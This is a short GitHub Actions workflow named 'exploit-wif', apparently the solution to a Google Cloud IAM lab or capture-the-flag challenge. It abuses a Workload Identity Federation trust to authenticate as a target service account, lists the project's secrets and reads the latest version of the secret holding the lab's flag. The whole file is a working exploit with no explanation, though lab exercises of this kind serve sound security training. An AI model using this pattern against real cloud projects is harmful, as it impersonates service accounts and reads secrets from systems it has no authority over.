name: exploit-wif
on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  access_gcp:
    runs-on: ubuntu-latest
    steps:
      - name: Authenticate to GCP using Workload Identity Federation
        uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: "projects/48994678794/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider"
          service_account: "iam-lab-7-target@gcp-labs-9necgia2.iam.gserviceaccount.com"

      - name: List secrets to confirm creds
        run: |
          gcloud secrets list --project=gcp-labs-9necgia2

      - name: Get flag
        run: |
          gcloud secrets versions access latest \
            --secret=flag_iam_lab_7 \
            --project=gcp-labs-9necgia2
